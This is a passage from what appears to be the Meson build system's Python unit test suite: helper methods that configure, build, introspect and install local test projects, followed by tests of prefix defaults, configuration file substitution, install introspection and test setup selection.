self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix]
if self.libdir:
args += ['--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats(confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
# Key error as they do not exists
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False, 'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True, 'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value', 'description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10, 'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value', 'description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
# Handles meson format exceptions
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'], 'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_force_fallback_for(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
